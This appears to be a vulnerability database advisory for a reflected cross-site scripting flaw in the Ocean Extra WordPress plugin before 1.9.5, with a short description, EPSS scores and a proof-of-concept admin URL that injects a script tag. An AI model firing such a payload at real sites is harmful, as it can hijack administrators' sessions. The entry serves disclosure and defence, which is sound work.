Lucene search

K
wpexploitZhongFu Su(JrXnm) of Wuhan UniversityWPEX-ID:2EE6F1D8-3803-42F6-9193-3DD8F416B558
HistoryMay 24, 2022 - 12:00 a.m.

Ocean Extra < 1.9.5 - Reflected Cross-Site Scripting

2022-05-2400:00:00
ZhongFu Su(JrXnm) of Wuhan University
218
ocean extra; 1.9.5; reflected cross-site scripting; vulnerability; website security; exploit; url-based attack

EPSS

0.001

Percentile

43.5%

The plugin does not escape generated links which are then used when the OceanWP theme is active, leading to a Reflected Cross-Site Scripting issue

https://example.com/wp-admin/?step=demo&page=owp_setup&a"><script>alert(/XSS/)</script>

EPSS

0.001

Percentile

43.5%

Related for WPEX-ID:2EE6F1D8-3803-42F6-9193-3DD8F416B558